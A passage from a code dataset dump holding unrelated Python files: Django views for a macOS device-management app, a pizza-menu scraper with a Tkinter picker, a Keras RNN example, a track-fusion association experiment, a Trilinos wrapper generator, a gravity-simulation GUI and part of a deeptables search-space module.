The opposite is\n true when a primary key value is supplied for `app`.\n\n :param device: Primary key of device (Optional)\n :param app: Primary key of managed application (Optional)\n \"\"\"\n context = {}\n\n if device is not None:\n resource_type = \"apps\"\n rel = get_object_or_404(Laptop, pk=device)\n options = MacOSApp.objects.exclude(Q(pending_install__in=[rel]) | Q(installed__in=[rel]))\\\n .filter(merged_into__isnull=True)\n # The following message will be displayed if there are no options (doesn't render in the form view)\n context['message'] = \"It seems like there are no more applications to assign to this device.\"\n else:\n resource_type = \"devices\"\n rel = get_object_or_404(MacOSApp, pk=app)\n options = Laptop.objects.filter(mdm_enrolled=True, retired=False) \\\n .exclude(Q(apps_pending__in=[rel]) | Q(apps_installed__in=[rel]))\n # The following message will be displayed if there are no options (doesn't render in the form view)\n context['message'] = \"It seems like there are no more eligible devices to assign this app to.\"\n if request.method == 'POST':\n form = AssignmentForm(request.POST, type=resource_type, options=options)\n if form.is_valid():\n selected = form.cleaned_data.get('options')\n context['NO_FOOT'] = True\n if isinstance(rel, Laptop):\n for option in selected:\n app = MacOSApp.objects.get(pk=option)\n rel.apps_pending.add(app)\n if len(selected) == 1:\n context['message'] = \"1 app was assigned to %s\" % rel.name\n else:\n context['message'] = \"%s apps were assigned to %s\" % (len(selected), rel.name)\n elif isinstance(rel, MacOSApp):\n for option in selected:\n device = Laptop.objects.get(name=option)\n rel.pending_install.add(device)\n context['message'] = \"This application has been assigned to %s new device(s)\" % (len(selected))\n context['title'] = \"Success!\"\n context['EXIT_BTN'] = True\n context['EXIT_URL'] = reverse(\"mdm:list\")\n return render(request, 'default.html', context)\n else:\n if options.count() == 0:\n context['title'] = \"Hmm...\"\n context['NO_FOOT'] = True\n return render(request, 'default.html', context)\n form = AssignmentForm(type=resource_type, options=options)\n context['form'] = form\n return render(request, 'form_crispy.html', context)\n\n\n@login_required\n@permission_required('devices.manage_apps', raise_exception=True)\ndef remove_app(request, app, device=0):\n \"\"\"\n If a primary key value is supplied for both the `device` and `app`, the user will be able to remove the\n assignment between the managed application and that particular device. 
If only the `app` is provided, all device\n assignments for the application will be removed and the app will no longer be available to devices under the MDM.\n\n :param app: Primary key of managed application\n :param device: Primary key of device (Optional)\n \"\"\"\n context = {}\n app = get_object_or_404(MacOSApp, pk=app)\n if device == 0:\n # Completely remove Application from MDM\n mode = 'delete'\n if app.installed.all().count() == 0:\n app.delete()\n messages.success(request, \"Application was successfully deleted\", extra_tags='success')\n return HttpResponseRedirect(reverse(\"mdm:apps\"))\n else:\n context['form'] = UninstallAppForm(mode=mode)\n else:\n # Unlink app from device\n laptop = get_object_or_404(Laptop, pk=device)\n if app in laptop.apps_pending.all():\n laptop.apps_pending.remove(app)\n messages.success(request, \"Application is no longer assigned to {}\".format(laptop.name),\n extra_tags='success')\n return HttpResponseRedirect(reverse(\"mdm:apps\"))\n\n # If pending removal reset to installed status\n if app in laptop.apps_remove.all():\n laptop.apps_installed.add(app)\n laptop.apps_remove.remove(app)\n messages.success(request, \"Removal request cancelled\", extra_tags='success')\n return HttpResponseRedirect(reverse(\"mdm:apps\"))\n\n if app in laptop.apps_installed.all():\n mode = 'disassociate'\n context['form'] = UninstallAppForm(mode=mode)\n else:\n raise Http404\n\n # Handle form data\n if request.method == 'POST':\n form = UninstallAppForm(request.POST, mode=mode)\n if form.is_valid():\n if mode == 'disassociate':\n record = get_object_or_404(InstallationRecord, app=app, device=laptop, active=True)\n record.active = False\n record.expires = timezone.now()\n record.save()\n laptop.apps_installed.remove(app)\n messages.success(request, \"Application successfully removed from {}\".format(laptop.name),\n extra_tags='success')\n else:\n app.delete()\n messages.success(request, \"Application deleted successfully\")\n return HttpResponseRedirect(reverse(\"mdm:apps\"))\n else:\n context['form'] = form\n return render(request, 'form_crispy.html', context)\n\n\n@login_required\n@permission_required('devices.manage_mdm', raise_exception=True)\ndef logs(request):\n \"\"\"Displays logs detailing what was installed on what devices and when\"\"\"\n def get_timestamp(data):\n return data.get('timestamp')\n\n events = []\n for record in InstallationRecord.objects.all():\n if record.profile:\n resource = record.profile\n resource_type = \"(Configuration Profile) \"\n else:\n resource = record.app\n if record.version:\n resource_type = \"(\" + record.version + \") \"\n else:\n resource_type = \"\"\n if record.active:\n obj = {'timestamp': record.installed_on,\n 'details': resource.name + \" \" + resource_type + \"was installed on \" + record.device.name}\n events.append(obj)\n else:\n obj = {'timestamp': record.expires,\n 'details': resource.name + \" \" + resource_type + \"was removed from \" + record.device.name}\n events.append(obj)\n obj = {'timestamp': record.installed_on,\n 'details': resource.name + \" \" + resource_type + \"was installed on \" + record.device.name}\n events.append(obj)\n events.sort(key=get_timestamp, reverse=True)\n\n paginator = Paginator(events, 50)\n page_number = request.GET.get('page', 1)\n current_page = paginator.get_page(page_number)\n context = {'headers': ['Timestamp', 'Event'], 'title': 'Install Log', 'events': current_page}\n return render(request, 'access_log.html', 
context)\n","repo_name":"WPI-LNL/lnldb","sub_path":"devices/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":57405,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"81"} +{"seq_id":"24741234051","text":"from bs4 import BeautifulSoup\nimport requests\nfrom tkinter import * \nimport random\n\nurl = \"https://www.pizzeriamilan.nu/\"\npage = requests.get(url)\n\n # Creating the soup\nsoup = BeautifulSoup(page.content, 'html.parser')\n\n # Initializing the list\nh2_list = []\n\n # Getting all the h2 tags\nh2_tags = soup.find_all(\"div\", {\"class\": \"text-wrap\"})\n\n # Appending h2 text to the list\nfor h2 in h2_tags:\n h2_list.append(h2.find(\"h2\").text)\n\n # Manipulating the list\nh2_list = [item.replace(\"\\n\", \"\").replace(\"\\r\", \"\") for item in h2_list]\n\n # Printing the list\nprint(h2_list)\n\n\n# Function to randomly select an item. \ndef random_item(): \n\t# Select an item randomly. \n\tx = random.choice(h2_list) \n\t# Set the label to display the item. \n\tlabel.config(text = x) \n\n# Create a window. \nroot = Tk() \n\n# Set the title of the window. \nroot.title(\"Random Food picker at Pizzeria Milan\") \n\n# Create a label to display the randomly \n# selected item. \nlabel = Label(root, font = ('Helvetica', 20)) \nlabel.pack() \n\n# Create a button to generate a random item. \nbutton = Button(root, text = \"Get food item\", \n\t\t\t\tcommand = random_item, \n\t\t\t\tbg = \"white\", fg = \"black\") \nbutton.pack(fill = X) \n\nroot.geometry(\"400x100\")\n# Run the main loop. \nroot.mainloop()","repo_name":"mhmdalkhyyt/milan_food_picker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11546918728","text":"# -*- coding: UTF-8 -*-\n__author__ = 'zy'\n__time__ = '2019/12/12 16:43'\nfrom keras.layers import LSTM,Embedding,SimpleRNN,Dense\nfrom keras.models import Sequential\nfrom keras.preprocessing import sequence\nimport keras.models\nfrom keras.datasets import imdb\n\nmax_features=10000\nmaxlen=500\nbatch_size=32\n\n(input_train,y_train),(input_test,y_test)=imdb.load_data(num_words=max_features)\ninput_train=sequence.pad_sequences(input_train,maxlen=maxlen)\ninput_test=sequence.pad_sequences(input_test,maxlen=maxlen)\n\nmodel=Sequential()\nmodel.add(Embedding(10000,32))\nmodel.add(SimpleRNN(32))\nmodel.add(Dense(1,activation='sigmoid'))\n\nmodel.compile(optimizer='rmsprop',loss='binary_crossentropy',metrics=['acc'])\n\nhistory=model.fit(input_train,y_train,\n epochs=10,\n batch_size=128,\n validation_split=0.2)\n\nmodel.summary()\n\nimport matplotlib.pyplot as plt\n\nacc=history.history['acc']\nval_acc=history.history['val_acc']\nloss=history.history['loss']\nval_loss=history.history['val_loss']\n\nepochs=range(1,len(acc)+1)\n\nplt.plot(epochs,acc,'bo',label='Training acc')\nplt.plot(epochs,val_acc,'b',label='Validation acc')\n\nplt.title('Training and validation accuracy')\nplt.legend()\n\nplt.figure()\n\nplt.plot(epochs,loss,'bo',label='Training loss')\nplt.plot(epochs,val_loss,'b',label='Validation loss')\nplt.title('Training and Validation loss')\n\nplt.legend()\n\nplt.show()\nfrom keras.models import load_model\n# 保存模型 from keras.models import load_model\nmodel.save('model_simpleRnn.h5') # HDF5文件,pip install 
h5py","repo_name":"yemanzhongting/notebook","sub_path":"1212rnn/rnn.py","file_name":"rnn.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30482721716","text":"\"\"\"MC_COUNTING_TECHNIQUE\n\nScript to\n\n\"\"\"\n\n# seeds\nimport numpy as np\nfrom stonesoup.types.state import GaussianState\n\nfrom data_association.CountingAssociator import CountingAssociator\nfrom data_association.bar_shalom_hypothesis_associators import HypothesisTestIndependenceAssociator, \\\n HypothesisTestDependenceAssociator\nfrom trackers.kf_dependent_fusion_async_sensors import KalmanFilterDependentFusionAsyncSensors\nfrom utils import open_object\nfrom utils.scenario_generator import generate_scenario_3\n\nstart_seed = 0\nend_seed = 5 # normally 500\nnum_mc_iterations = end_seed - start_seed\n\n# params\nsave_fig = False\n\n# scenario parameters\nsigma_process_list = [0.3] # [0.05, 0.05, 0.05, 0.5, 0.5, 0.5, 3, 3, 3]\nsigma_meas_radar_list = [50] # [5, 30, 200, 5, 30, 200, 5, 30, 200]\nsigma_meas_ais_list = [10] # [10] * 9\nradar_meas_rate = 1 # relevant radar meas rates: 1\nais_meas_rate_list = [6] # relevant AIS meas rates: 2 - 12\ntimesteps = 200\n\n# associator params\nassociation_distance_threshold = 20\nconsecutive_hits_confirm_association = 3\nconsecutive_misses_end_association = 2\nalpha = 0.02\n\n# dicts to store final results for printing in a latex friendly way\nPc_overall = {} # Pc is the percentage of correctly associating tracks that originate from the same target\nsomething_else_overall = {}\nstats = []\n\nfor sigma_process, sigma_meas_radar, sigma_meas_ais, ais_meas_rate in zip(sigma_process_list, sigma_meas_radar_list,\n sigma_meas_ais_list, ais_meas_rate_list):\n for seed in range(start_seed, end_seed):\n # generate scenario\n generate_scenario_3(seed=seed, permanent_save=False, radar_meas_rate=radar_meas_rate,\n ais_meas_rate=ais_meas_rate, sigma_process=sigma_process,\n sigma_meas_radar=sigma_meas_radar, sigma_meas_ais=sigma_meas_ais,\n timesteps=timesteps)\n\n folder = \"temp\" # temp instead of seed, as it is not a permanent save\n\n # load ground truth and the measurements\n data_folder = \"../scenarios/scenario3/\" + folder + \"/\"\n ground_truth = open_object.open_object(data_folder + \"ground_truth.pk1\")\n measurements_radar = open_object.open_object(data_folder + \"measurements_radar.pk1\")\n measurements_ais = open_object.open_object(data_folder + \"measurements_ais.pk1\")\n\n # load start_time\n start_time = open_object.open_object(data_folder + \"start_time.pk1\")\n\n # prior\n initial_covar = np.diag([sigma_meas_radar * sigma_meas_ais, sigma_meas_radar * sigma_process,\n sigma_meas_radar * sigma_meas_ais, sigma_meas_radar * sigma_process]) ** 2\n prior = GaussianState([1, 1.1, -1, 0.9], initial_covar, timestamp=start_time)\n\n kf_dependent_fusion = KalmanFilterDependentFusionAsyncSensors(start_time, prior,\n sigma_process_radar=sigma_process,\n sigma_process_ais=sigma_process,\n sigma_meas_radar=sigma_meas_radar,\n sigma_meas_ais=sigma_meas_ais)\n\n tracks_fused_dependent, tracks_radar, tracks_ais = kf_dependent_fusion.track_async(\n start_time, measurements_radar, measurements_ais, fusion_rate=1)\n\n # use the CountingAssociator to evaluate whether the tracks are associated\n associator = CountingAssociator(association_distance_threshold, consecutive_hits_confirm_association,\n consecutive_misses_end_association)\n independence_test_associator = 
HypothesisTestIndependenceAssociator(alpha=alpha)\n dependence_test_associator = HypothesisTestDependenceAssociator(alpha=alpha)\n\n num_correct_associations_counting = 0\n num_false_mis_associations_counting = 0\n num_correct_associations_independent_hypothesis = 0\n num_false_mis_associations_independent_hypothesis = 0\n num_correct_associations_dependent_hypothesis = 0\n num_false_mis_associations_dependent_hypothesis = 0\n for i in range(1, len(tracks_radar)):\n # use the associators to check for association\n associated_counting = associator.associate_tracks(tracks_radar[:i], tracks_ais[:i])\n associated_independence_test = independence_test_associator.associate_tracks(tracks_radar[:i + 1],\n tracks_ais[:i + 1])\n cross_cov_list = kf_dependent_fusion.cross_cov_list\n cross_cov_dict = {'cross_cov_ij': cross_cov_list,\n 'cross_cov_ji': [cross_cov.transpose() for cross_cov in cross_cov_list]}\n associated_dependence_test = dependence_test_associator.associate_tracks(tracks_radar[:i + 1],\n tracks_ais[:i + 1],\n cross_cov_ij=cross_cov_list[\n :i + 1],\n cross_cov_ji=[cross_cov.transpose()\n for cross_cov\n in cross_cov_list[\n :i + 1]]\n )\n # save the associations in dicts\n num_correct_associations_counting += associated_counting\n num_false_mis_associations_counting += not associated_counting\n num_correct_associations_independent_hypothesis += associated_independence_test\n num_false_mis_associations_independent_hypothesis += not associated_independence_test\n num_correct_associations_dependent_hypothesis += associated_dependence_test\n num_false_mis_associations_dependent_hypothesis += not associated_dependence_test\n\n # save the number of correct associations and false mis associations in a dict\n stats_individual = {'seed': seed, 'num_correct_associations': num_correct_associations_counting,\n 'num_false_mis_associations': num_false_mis_associations_counting,\n 'type': \"counting\"}\n stats.append(stats_individual)\n stats_individual = {'seed': seed, 'num_correct_associations': num_correct_associations_independent_hypothesis,\n 'num_false_mis_associations': num_false_mis_associations_independent_hypothesis,\n 'type': \"independent\"}\n stats.append(stats_individual)\n stats_individual = {'seed': seed, 'num_correct_associations': num_correct_associations_dependent_hypothesis,\n 'num_false_mis_associations': num_false_mis_associations_dependent_hypothesis,\n 'type': \"dependent\"}\n stats.append(stats_individual)\n\n # print the percentage correct associations for each technique\n percentage_correct_counting = num_correct_associations_counting/(\n num_correct_associations_counting + num_false_mis_associations_counting\n )\n percentage_correct_independent_hypothesis = num_correct_associations_independent_hypothesis / (\n num_correct_associations_independent_hypothesis + num_false_mis_associations_independent_hypothesis\n )\n percentage_correct_dependent_hypothesis = num_correct_associations_dependent_hypothesis/(\n num_correct_associations_dependent_hypothesis + num_false_mis_associations_dependent_hypothesis\n )\n text = \"counting: \" + str(percentage_correct_counting) +\\\n \", independent: \" + str(percentage_correct_independent_hypothesis) + \\\n \", dependent: \" + str(percentage_correct_dependent_hypothesis)\n print(text)\n\n# calc the #correct_associations and #false_mis_associations for each associating technique\ntot_num_correct_associations_counting = sum(\n [stat['num_correct_associations'] for stat in stats if stat['type'] == 
\"counting\"]\n)\ntot_num_false_mis_associations_counting = sum(\n [stat['num_false_mis_associations'] for stat in stats if stat['type'] == \"counting\"]\n)\ntot_num_correct_associations_independent_hypothesis = sum(\n [stat['num_correct_associations'] for stat in stats if stat['type'] == \"independent\"]\n)\ntot_num_false_mis_associations_independent_hypothesis = sum(\n [stat['num_false_mis_associations'] for stat in stats if stat['type'] == \"independent\"]\n)\ntot_num_correct_associations_dependent_hypothesis = sum(\n [stat['num_correct_associations'] for stat in stats if stat['type'] == \"dependent\"]\n)\ntot_num_false_mis_associations_dependent_hypothesis = sum(\n [stat['num_false_mis_associations'] for stat in stats if stat['type'] == \"dependent\"]\n)\n\n# todo: print the total percentage correct associations\ntot_percentage_correct_counting = tot_num_correct_associations_counting / (\n tot_num_correct_associations_counting + tot_num_false_mis_associations_counting\n)\ntot_percentage_correct_independent_hypothesis = tot_num_correct_associations_independent_hypothesis / (\n tot_num_correct_associations_independent_hypothesis + tot_num_false_mis_associations_independent_hypothesis\n)\ntot_percentage_correct_dependent_hypothesis = tot_num_correct_associations_dependent_hypothesis / (\n tot_num_correct_associations_dependent_hypothesis + tot_num_false_mis_associations_dependent_hypothesis\n)\ntext = \"Total: \\ncounting: \" + str(tot_percentage_correct_counting) + \\\n \", independent: \" + str(tot_percentage_correct_independent_hypothesis) + \\\n \", dependent: \" + str(tot_percentage_correct_dependent_hypothesis)\n\nprint(text)\n","repo_name":"jonassagild/Track-to-Track-Fusion","sub_path":"scripts/mc_associations_same_origin.py","file_name":"mc_associations_same_origin.py","file_ext":"py","file_size_in_byte":10289,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"81"} +{"seq_id":"40003804557","text":"import sys\nsys.path.append('lib/')\n\nimport os\nfrom string import Template\nfrom ConfigParser import SafeConfigParser\nfrom XpetraLib import *\nfrom XpetraLibConfig import *\n\n\ndef buildFuncLineTpetra( functionNode ):\n\n#TODO: clean up\n tree = etree.parse(conf_XMLclass)\n root = tree.getroot() # root == \n classNode = root[0] # classNode == \n\n fullClassName = classNode.xpath('compoundname')[0].text # Tpetra::Map\n baseClassName = fullClassName.lstrip('Tpetra::') # Map\n className = 'Tpetra'+baseClassName # TpetraMap\n##\n\n # = function name\n name = functionNode.xpath('name')[0].text\n if name == baseClassName: name = className\n if name == '~'+baseClassName: name = '~'+className\n\n # = return type of the function\n type = functionNode.xpath('type')[0].xpath(\"string()\")\n\n # \n argsstring = functionNode.xpath('argsstring')[0].text\n\n # skip deprecated functions\n if 'TPETRA_DEPRECATED' in type: return ''\n\n # hack for Vector:\n # - add missing 'typename'\n # - do not add MultiVector inherited methods\n if 'magnitudeType' in type: type = 'typename ' + type\n if functionNode.xpath('//compoundname')[0].text == 'Tpetra::Vector':\n if name in ['dot','norm1','norm2','normInf','normWeighted','meanValue'] and 'ArrayView' in argsstring: return ''\n if functionNode.xpath('//compoundname')[0].text == 'Tpetra::Vector':\n if name in ['replaceGlobalValue','sumIntoGlobalValue','replaceLocalValue','sumIntoLocalValue'] and 'size_t vectorIndex' in argsstring: return ''\n\n # hack for MultiVector\n # if name == \"scale\" and \"Teuchos::ArrayView< 
const Scalar > alpha\" in argsstring: return ''\n # if name == \"scale\" and \"const Scalar &alpha, const MultiVector< Scalar, LocalOrdinal, GlobalOrdinal, Node > &A\" in argsstring: return ''\n\n #hack for CrsMatrix\n if name == \"getLocalRowCopy\" and \"const =0\" in argsstring: return ''\n if name == \"TpetraCrsMatrix\" and \"const RCP< const CrsGraph< LocalOrdinal, GlobalOrdinal, Node> > &graph\" in argsstring: return ''\n if className == \"TpetraCrsMatrix\" and \"const =0\" in argsstring: argsstring = argsstring.replace(\"const =0\", \"const\")\n\n #hack for RowMatrix\n if className == \"TpetraRowMatrix\" and \"const =0\" in argsstring: argsstring = argsstring.replace(\"const =0\", \"const\")\n\n # -> get list of arg name as a string 'GIDList, nodeIDList, LIDList'\n # Simple version\n # paramList = functionNode.xpath('param/declname/text()')\n # paramStr = ', '.join(param for param in paramList)\n\n # More complete version\n paramStr = ''\n paramNodes = functionNode.xpath('param')\n #print name\n for paramNode in paramNodes:\n n = paramNode.xpath('declname')[0].xpath(\"string()\")\n if paramNode.xpath('type')[0].xpath(\"string()\") in conf_TypeWrapped:\n paramStr += \"toTpetra(\" + n + \")\"\n else:\n paramStr += n\n\n paramStr += \", \"\n\n paramStr = paramStr.rstrip(', ')\n\n # briefdescription\n briefdescription = functionNode.xpath(\"briefdescription\")[0].xpath(\"string()\")\n\n if len(type) > 0:\n declStr = type + \" \" + name + argsstring\n else:\n declStr = name + argsstring\n declStr = declStr.rstrip()\n\n if name in conf_RemoveRefFunctionList: declStr = declStr.replace('&', '')\n\n descStr = \" //! \" + briefdescription.lstrip().rstrip() + \"\\n\"\n defStr = \" \" + declStr\n\n if name != className and name != \"~\"+className:\n defStr += \" { \"\n defStr += \"XPETRA_MONITOR(\\\"\" + className + \"::\" + name + \"\\\"); \"\n if len(type) > 0 and type != 'void': defStr += 'return '\n if type in conf_TypeWrapped: defStr += \"toXpetra(\"\n defStr += conf_memberName + \"->\" + name\n defStr += \"(\" + paramStr\n if type in conf_TypeWrapped: defStr += \")\"\n defStr += \"); }\"\n\n # constructor\n if name == className:\n defStr += \"\\n \" + \": \" + conf_memberName + \"(Teuchos::rcp(new \" + fullClassName + \"< \"+templateParam+\" >\"\n defStr += \"(\" + paramStr + \"))) { \"\n defStr += \" }\"\n\n # destructor\n if name == '~'+className:\n defStr += \" { \"\n defStr += \" }\"\n\n return descStr + defStr + \"\\n\" + \"\\n\";\n\n####\n\nxml_dir = trilinosRoot_dir + '/packages/tpetra/doc/xml/'\nconf_dir = 'tpetra/conf/'\ntmpl_dir = 'tpetra/tmpl/'\nout_dir = '../src/'\n\nfor file in os.listdir(conf_dir):\n basename, extension = os.path.splitext(file)\n if extension == \".conf\":\n\n#### READ CONFIG ####\n parser = SafeConfigParser()\n parser.read(conf_dir + file)\n\n conf_XMLheaders = xml_dir + parser.get('io', 'XMLheaders')\n conf_XMLclass = xml_dir + parser.get('io', 'XMLclass')\n conf_template = tmpl_dir + parser.get('io', 'template')\n conf_output = parser.get('io', 'output')\n\n conf_SkipFunctionList = set(parser.get('function', 'skip').split(';'))\n conf_RemoveRefFunctionList = set(parser.get('function', 'removeref').split(';'))\n conf_SkipHeaderList = set(parser.get('header', 'skip').split(';'))\n conf_memberName = parser.get('member', 'name')\n conf_TypeWrapped = set(parser.get('type', 'wrapped').split(';'))\n#\n\n template = open(conf_template, 'r').read()\n out = Template(template)\n\n className = buildClassDefinition(conf_XMLclass, 'Tpetra')\n templateParam = 
buildTemplateParam2(conf_XMLclass)\n\n out = out.substitute(\n TMPL_HEADERS=buildHeader(className, 'tpetra.py'),\n TMPL_INCLUDES=buildInclude(conf_XMLheaders, conf_SkipHeaderList),\n TMPL_TEMPLATE_PARAM=buildTemplateParam(conf_XMLclass),\n TMPL_CLASS=className,\n TMPL_INHERITANCE=' ' + parser.get('inheritance', 'parent').rstrip(),\n TMPL_DESTRUCTOR=buildDestructor(className),\n TMPL_PUBLIC_FUNCTIONS=buildClassFunctions(conf_XMLclass, conf_SkipFunctionList, buildFuncLineTpetra),\n TMPL_FOOTERS=buildFooter(className)\n )\n f = open(out_dir + conf_output, 'w')\n f.write(out)\n f.close()\n\n","repo_name":"trilinos/Trilinos","sub_path":"packages/xpetra/scripts/tpetra.py","file_name":"tpetra.py","file_ext":"py","file_size_in_byte":6133,"program_lang":"python","lang":"en","doc_type":"code","stars":1088,"dataset":"github-code","pt":"81"} +{"seq_id":"346097491","text":"from tkinter import *\nimport Search as Search\nimport Import_Data as ID\nimport Export_Data as ED\nimport Colour_Maker as CM\nimport Check_Input as CI\nimport Random_Input as RI\nimport os\n\n\ndef main():\n width_of_window = int(1005)\n height_of_window = int(1005)\n\n points = []\n correct_input = True\n\n while correct_input:\n N = input(\"Введите число точек: (Целое число, после ввода нажмите enter)\")\n\n\n if not N.isdigit():\n print('Некорректный ввод, повторите попытку: ')\n continue\n\n N = int(N)\n\n if N == 0:\n print('Введите число, отличное от 0')\n continue\n\n\n print('Как произвести заполнение данных о точках, вручную или случайным образом?')\n mod = int(input('Введите 0, если заполнение будет в ручном режиме, или 1, если желаете заполнить данные'\n ' автоматически: '))\n\n if mod == 1:\n points = RI.Random_points(N)\n else:\n i = 0\n while i < N:\n points.append([input(\"Введите массу точки в десятичном формате (XXX.X), затем нажмите enter): \"),\n input(\"Введите координату x точки (целое число, не больше 200), затем нажмите enter: \"),\n input(\"Введите координату н точки (целое число, не больше 200), затем нажмите enter: \")])\n\n if ((CI.is_digit(points[i][0]) is False or (points[i][0].isdigit())) or\n ((points[i][1].isdigit() is False) or (int(points[i][1]) < 0 or int(points[i][1]) > 200)) or\n ((points[i][2].isdigit() is False) or (int(points[i][2]) < 0 or int(points[i][2]) > 200))):\n print('Вы ввели некоректные данные. 
Повторите ввод данный последней точки: ')\n points.pop(i)\n else:\n i = i + 1\n\n ED.Export_Data(points, N)\n\n os.system('.\\Simulation.exe')\n\n Data, a = ID.Import_data(\"Data.txt\")\n maximum, minimum = Search.Search(Data, a)\n\n os.system('del Data.txt')\n os.system('del Points.txt')\n\n correct_input = False\n\n root = Tk()\n c = Canvas(root, width=width_of_window, height=height_of_window, bg='white')\n\n rectangle_width = int(width_of_window / a)\n rectangle_height = int(height_of_window / a)\n\n for i in range(a):\n for j in range(a):\n colour = CM.Make_colour_index(Data[i][j], minimum, maximum)\n x_up = j * rectangle_width\n y_up = i * rectangle_height\n x_down = x_up + rectangle_width\n y_down = y_up + rectangle_height\n c.create_rectangle(x_up, y_up, x_down, y_down, fill=colour)\n\n c.pack()\n root.mainloop()\n\n\nmain()\n","repo_name":"VarlamovAM/Training_projects","sub_path":"Simulation_of_gravity/main_GUI.py","file_name":"main_GUI.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73840446664","text":"# -*- coding:utf-8 -*-\n__author__ = 'yangjian'\n\"\"\"\n\n\"\"\"\nimport copy\n\nimport pandas as pd\nimport pickle\n\nfrom deeptables.models.config import ModelConfig\nfrom deeptables.models.deeptable import DeepTable\nfrom deeptables.models.preprocessor import DefaultPreprocessor\nfrom deeptables.utils import dt_logging, fs, consts as DT_consts\nfrom hypernets.core.search_space import HyperSpace, ModuleSpace, Choice, Bool, MultipleChoice\nfrom hypernets.experiment import make_experiment as _make_experiment\nfrom hypernets.model import Estimator, HyperModel\nfrom hypernets.utils import DocLens, isnotebook\n\nlogger = dt_logging.get_logger(__name__)\n\n\ndef _to_hp(v):\n if isinstance(v, (list, tuple)):\n v = Choice(v)\n return v\n\n\nclass DTModuleSpace(ModuleSpace):\n def __init__(self, space=None, name=None, **hyperparams):\n ModuleSpace.__init__(self, space, name, **hyperparams)\n self.space.DT_Module = self\n self.config = None\n\n def _compile(self):\n self.config = ModelConfig(**self.param_values)\n\n def _forward(self, inputs):\n return inputs\n\n def _on_params_ready(self):\n self._compile()\n\n\nclass DTFit(ModuleSpace):\n def __init__(self, space=None, name=None, **hyperparams):\n # if batch_size is None:\n # batch_size = Choice([128, 256])\n # hyperparams['batch_size'] = batch_size\n #\n # if epochs is not None:\n # hyperparams['epochs'] = epochs\n\n for k, v in hyperparams.items():\n hyperparams[k] = _to_hp(v)\n\n ModuleSpace.__init__(self, space, name, **hyperparams)\n self.space.fit_params = self\n\n def _compile(self):\n pass\n\n def _forward(self, inputs):\n return inputs\n\n def _on_params_ready(self):\n self._compile()\n\n\nclass DnnModule(ModuleSpace):\n def __init__(self, hidden_units=None, reduce_factor=None, dnn_dropout=None, use_bn=None, dnn_layers=None,\n activation=None, space=None, name=None, **hyperparams):\n if hidden_units is None:\n hidden_units = [100, 200, 300, 500, 800, 1000]\n hyperparams['hidden_units'] = _to_hp(hidden_units)\n\n if reduce_factor is None:\n reduce_factor = [1, 0.8, 0.5]\n hyperparams['reduce_factor'] = _to_hp(reduce_factor)\n\n if dnn_dropout is None:\n dnn_dropout = [0, 0.1, 0.3, 0.5]\n hyperparams['dnn_dropout'] = _to_hp(dnn_dropout)\n\n if use_bn is None:\n use_bn = Bool()\n hyperparams['use_bn'] = use_bn\n\n if dnn_layers is None:\n dnn_layers = [1, 2, 3]\n hyperparams['dnn_layers'] = _to_hp(dnn_layers)\n\n if 
activation is None:\n activation = 'relu'\n hyperparams['activation'] = activation\n\n ModuleSpace.__init__(self, space, name, **hyperparams)\n\n def _compile(self):\n dnn_layers = self.param_values['dnn_layers']\n hidden_units = []\n for i in range(0, dnn_layers):\n hidden_units.append(\n (int(self.param_values['hidden_units'] * 1 if i == 0 else (\n self.param_values['hidden_units'] * (self.param_values['reduce_factor'] ** i))),\n self.param_values['dnn_dropout'],\n self.param_values['use_bn']))\n dnn_params = {\n 'hidden_units': hidden_units,\n 'dnn_activation': self.param_values['activation'],\n }\n self.space.DT_Module.config = self.space.DT_Module.config._replace(dnn_params=dnn_params)\n\n def _forward(self, inputs):\n return inputs\n\n def _on_params_ready(self):\n self._compile()\n\n\nclass DTEstimator(Estimator):\n def __init__(self, space_sample, cache_preprocessed_data=False, **config_kwargs):\n Estimator.__init__(self, space_sample=space_sample)\n\n self.config_kwargs = config_kwargs\n self.cache_preprocessed_data = cache_preprocessed_data\n self.model = self._build_model(space_sample)\n\n # fitted\n self.classes_ = None\n\n def _build_model(self, space_sample):\n config = space_sample.DT_Module.config._replace(**self.config_kwargs)\n if self.cache_preprocessed_data:\n preprocessor = DefaultPreprocessor(config)\n else:\n preprocessor = None\n model = DeepTable(config, preprocessor=preprocessor)\n return model\n\n def summary(self):\n if logger.is_info_enabled():\n try:\n mi = self.model.get_model()\n if mi is not None:\n mi.model.summary()\n except(Exception) as ex:\n pass\n # logger.info('---------no summary-------------')\n # logger.info(ex)\n\n def fit(self, X, y, eval_set=None, pos_label=None, n_jobs=1, **kwargs):\n # fit_params = self.space_sample.__dict__.get('fit_params')\n # if fit_params is not None:\n # kwargs.update(fit_params.param_values)\n if kwargs.get('cross_validation') is not None:\n kwargs.pop('cross_validation')\n self.model.fit_cross_validation(X, y, n_jobs=n_jobs, **kwargs)\n else:\n fit_kwargs = self.space_sample.fit_params.param_values.copy()\n fit_kwargs.update(kwargs)\n self.model.fit(X, y, **fit_kwargs)\n\n self.classes_ = getattr(self.model, 'classes_', None)\n return self\n\n def fit_cross_validation(self, X, y, eval_set=None, metrics=None, pos_label=None, **kwargs):\n assert isinstance(metrics, (list, tuple))\n fit_kwargs = self.space_sample.fit_params.param_values.copy()\n fit_kwargs.update(kwargs)\n oof_proba, _, _, oof_scores = self.model.fit_cross_validation(X, y, oof_metrics=metrics, **fit_kwargs)\n\n # calc final score with mean\n scores = pd.concat([pd.Series(s) for s in oof_scores], axis=1).mean(axis=1).to_dict()\n logger.info(f'fit_cross_validation score:{scores}, folds score:{oof_scores}')\n\n self.classes_ = getattr(self.model, 'classes_', None)\n\n return scores, oof_proba, oof_scores, None, None, None, None\n\n def predict(self, X, **kwargs):\n return self.model.predict(X, **kwargs)\n\n def evaluate(self, X, y, eval_set=None, metrics=None, **kwargs):\n # scores = self.model.evaluate(X, y, batch_size=256, return_dict=False)\n scores = self.model.evaluate(X, y, batch_size=256, return_dict=False)\n dt_model = self.model.get_model()\n\n tf_metrics_names = 